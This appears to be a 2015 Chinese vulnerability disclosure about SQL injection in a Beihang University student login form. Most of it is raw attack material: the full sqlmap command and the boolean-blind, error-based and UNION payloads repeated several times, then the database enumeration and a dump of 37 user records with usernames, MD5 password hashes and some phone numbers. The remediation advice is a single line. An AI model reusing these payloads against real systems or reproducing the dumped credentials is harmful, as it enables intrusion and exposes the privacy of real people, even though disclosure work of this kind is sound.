2015-11-04: 细节已通知厂商并且等待厂商处理中 2015-11-06: 厂商已经确认,细节仅向厂商公开 2015-11-16: 细节向核心白帽子及相关领域专家公开 2015-11-26: 细节向普通白帽子公开 2015-12-06: 细节向实习白帽子公开 2015-12-21: 细节向公众公开
北京航空航天大学(简称北航)成立于1952年,由当时的清华大学、北洋大学、厦门大学、四川大学等八所院校的航空系合并组建,是新中国第一所航空航天高等学府,现隶属于工业和信息化部。学校分为学院路校区和沙河校区,占地3000亩,总建筑面积150余万平方米。自建校以来,北航一直是国家重点建设的高校,是全国第一批16所重点高校之一,也是80年代恢复学位制度后全国第一批设立研究生院的22所高校之一,首批进入“211工程”,2001年进入“985工程”。经过六十年的建设与发展,学校基本形成了研究型大学的核心竞争力,内在凝聚力和国内外影响力得到显著提升,跻身国内高水平大学的第一方阵。
地址:http://**.**.**.**/student/my/login
python sqlmap.py -u "http://**.**.**.**/student/my/login" --form -p LoginForm[username] --technique=BEU --random-agent --batch -D inspection -T in_user -C user_name,user_id,user_pwd,user_phone,user_qq,user_email,user_nkname --dump
---Parameter: LoginForm[username] (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: UNION query Title: MySQL UNION query (NULL) - 63 columns Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95---web application technology: PHP 5.3.13, Apacheback-end DBMS: MySQL 5.0current user: 'inspection@localhost'current user is DBA: Falsesqlmap resumed the following injection point(s) from stored session:---Parameter: LoginForm[username] (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: UNION query Title: MySQL UNION query (NULL) - 63 columns Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95---web application technology: PHP 5.3.13, Apacheback-end DBMS: MySQL 5.0database management system users [1]:[*] 'inspection'@'localhost'sqlmap resumed the following injection point(s) from stored session:---Parameter: LoginForm[username] (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: UNION query Title: MySQL UNION query (NULL) - 63 columns Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95---web application technology: PHP 5.3.13, Apacheback-end DBMS: MySQL 5.0available databases [2]:[*] information_schema[*] inspectionsqlmap resumed the following injection point(s) from stored session:---Parameter: LoginForm[username] (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: UNION query Title: MySQL UNION query (NULL) - 63 columns Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95---web application technology: PHP 5.3.13, Apacheback-end DBMS: MySQL 5.0Database: inspection[37 tables]+---------------------------+| YiiSession || in_application || in_arrange || in_arrangebak || in_assignxy || in_attendance || in_authassignment || in_authitem || in_authitemchild || in_config || in_course || in_courseallocation || in_courseallocationbak || in_coursebak || in_delayed || in_emapp || in_examinationarrangement || in_exemption || in_files || in_information || in_lookup || in_organization || in_otinfo || in_pici || in_precord || in_professional || in_professionalbak || in_province || in_review || in_scrollpicture || in_setconfig || in_sjpici || in_students || in_students_manage || in_teacher || in_user || in_vestigate |+---------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: LoginForm[username] (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: UNION query Title: MySQL UNION query (NULL) - 63 columns Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95---web application technology: PHP 5.3.13, Apacheback-end DBMS: MySQL 5.0Database: inspectionTable: in_user[27 columns]+-------------------+------------------+| Column | Type |+-------------------+------------------+| user_adderss | varchar(100) || user_authorize | varchar(500) || user_bddm | varchar(100) || user_email | varchar(30) || user_headimg | varchar(100) || user_id | int(11) unsigned || user_iparr | varchar(3000) || user_isdel | int(11) || user_lastip | varchar(50) || user_lasttime | int(11) || user_loginnum | int(11) || user_msn | varchar(100) || user_name | varchar(30) || user_nkname | varchar(100) || user_online | int(11) || user_organization | int(11) || user_phone | varchar(50) || user_pwd | varchar(50) || user_qq | varchar(50) || user_regtime | int(11) || user_role | int(11) || user_rolebz | varchar(100) || user_sfqz | varchar(100) || user_status | int(11) || user_tel | varchar(50) || user_tel2 | varchar(50) || user_webset | varchar(100) |+-------------------+------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: LoginForm[username] (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95 Type: UNION query Title: MySQL UNION query (NULL) - 63 columns Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95---web application technology: PHP 5.3.13, Apacheback-end DBMS: MySQL 5.0Database: inspectionTable: in_user[37 entries]+--------------+---------+----------------------------------+-------------+---------+------------------+-----------------------------------------------------------+| user_name | user_id | user_pwd | user_phone | user_qq | user_email | user_nkname |+--------------+---------+----------------------------------+-------------+---------+------------------+-----------------------------------------------------------+| admin | 1 | 82a4e6229c04c7eea5270cee9219cec8 | NULL | NULL | <blank> | čś\x85级玥ç\x90\x86ĺ\x91\x98 || sysadmin | 2 | 8b803df8479a34c942a39ec906ca6e81 | NULL | NULL | <blank> | çłťçť\x9f玥ç\x90\x86ĺ\x91\x98 || hdjgzx | 3 | 5ee4dad4aaa2154c58c325f257d21bfc | <blank> | NULL | <blank> | ĺ\x8d\x8eä¸\x9c玥ç\x90\x86ä¸\x8eć\x9c\x8dĺ\x8aĄä¸ĺż\x83 || hdjgzx1 | 4 | 5ee4dad4aaa2154c58c325f257d21bfc | NULL | NULL | NULL | ĺ\x8d\x8eä¸\x9cç\x9b\x91玥ä¸ĺż\x83 || bjshenhe | 5 | 14a2ee741534eef7c80edbe89de55924 | <blank> | NULL | <blank> | ĺ\x8c\x97äşŹĺŽĄć ¸çŽĄç\x90\x86 || 1000642001 | 10 | 4cd034305b3027762ee2ebfa15edbcb2 | <blank> | NULL | <blank> | ĺ¤\x8fć\x98Ľçş˘ || shuangxin | 11 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | é\x83业ç\x90´ || 1000642003 | 12 | 00044b51262110c94868789ebfb089e8 | <blank> | NULL | <blank> | ć\x88´é\x94\x90 || quanhao | 13 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | topwater || xuhuizx | 14 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | allround || 10006888 | 15 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | gxl || acking | 17 | fcea920f7412b5da7be0cf42b8c93759 | <blank> | NULL | <blank> | acking || 1000652101 | 18 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | ć˝\x98çąäş\x91 || 1000642004 | 19 | a5407e92b245b0c06017c9e6d381e6b5 | <blank> | NULL | <blank> | é\x99\x88č\x8f\x8a || chenju01 | 20 | eeef89774499b8aab48a9e477c0a0794 | <blank> | NULL | <blank> | é\x99\x88č\x8f\x8a || 1000641801 | 21 | 80c4b59647a5057d6f463ba95bf0063b | <blank> | NULL | <blank> | ç\x8e\x8bç\x8fŽč\x93\x93 || 1000652201 | 22 | 6d8a4276ee71937f560b4ff50651cfe8 | <blank> | NULL | <blank> | 莸波ĺ\x8b\x87 || 1000652101 | 24 | c16cdbf424606c50ccd1184361d20ac5 | <blank> | NULL | <blank> | ä˝\x95é\x92° || 1000640401 | 25 | ac1c2e86c2a8fb808325d8200d82b0c8 | <blank> | NULL | <blank> | çĽ\x81ĺž\x97ć\x98\x8e || 1000640301 | 26 | 20f58afd3043cdaf169ca9f2d3412bd2 | <blank> | NULL | <blank> | ç\x8e\x8bć\x96\x87äź\x9f || 1000640501 | 27 | 90aedecc1034df83a9159f85cee09a80 | 1897999500 | NULL | <blank> | ĺ\x88\x98çŁ\x8a || 1000645101 | 28 | a6a9b25e58a394ad7d7aae309226c8a5 | <blank> | NULL | <blank> | é\x82ąĺ°\x8fĺšł || 1000645001 | 29 | 9c1a8a30ac217bb9153e77b991aa6cf1 | <blank> | NULL | <blank> | čľľĺŠ\x95 || 1000642101 | 30 | fe1ee07a4acf16deb81efbef42c7b119 | <blank> | NULL | <blank> | ĺ§\x9a鲲 || qianlaoshi01 | 31 | cf5d7313034fdff73bdf5cd044916141 | <blank> | NULL | <blank> | ć˝\x9cçť´ĺ\x85´ || 1000642002 | 32 | 04ad64c1bfa92ff9061ddf91b797ff9b | <blank> | NULL | <blank> | ĺ\x99č\x8eš || 1000646401 | 33 | c80f865e9abc8b415cbc9701214cb3a1 | <blank> | NULL | <blank> | ć\x9bšĺ\x85śçŤŻ || beijing | 34 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | ĺ\x8c\x97亏 || bhceshi | 35 | d6a21b3940d10ce5753052d5f48c5ee8 | 123456 | NULL | 11111 | cj || wuzhenyou | 37 | ae45fcd57b567b6e2ec8f3d5ee73b458 | 13918160512 | NULL | <blank> | é\x99\x88ĺ\x8fś || sitadi | 38 | 96e79218965eb72c92a549dd5a330112 | 18918597013 | NULL | <blank> | ç\x8e\x8bć\x85§čś\x85 || sitadi | 39 | d04bcd6748b9ceee3063386209fae5e7 | 18918597013 | NULL | 421032151@**.**.**.** | ç\x8e\x8bć\x85§čś\x85 || xinshijie | 40 | 96e79218965eb72c92a549dd5a330112 | 13916760738 | NULL | <blank> | ć˘\x81澡ćŚ\x95 || xuesen | 41 | 21218cca77804d2ba1922c33e0151105 | 15216604364 | NULL | <blank> | ć\x9d\x9c棎 || haowei | 42 | 96e79218965eb72c92a549dd5a330112 | <blank> | NULL | <blank> | é˝\x90丽č\x90\x8d || nanhui | 43 | 96e79218965eb72c92a549dd5a330112 | <blank> | NULL | <blank> | é\x83业ç\x90´ || bjceshi | 44 | e10adc3949ba59abbe56e057f20f883e | <blank> | NULL | <blank> | éŤ\x98ĺąą |+--------------+---------+----------------------------------+-------------+---------+------------------+-----------------------------------------------------------+
增加过滤。
危害等级:高
漏洞Rank:10
确认时间:2015-11-06 15:17
CNVD确认所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。
暂无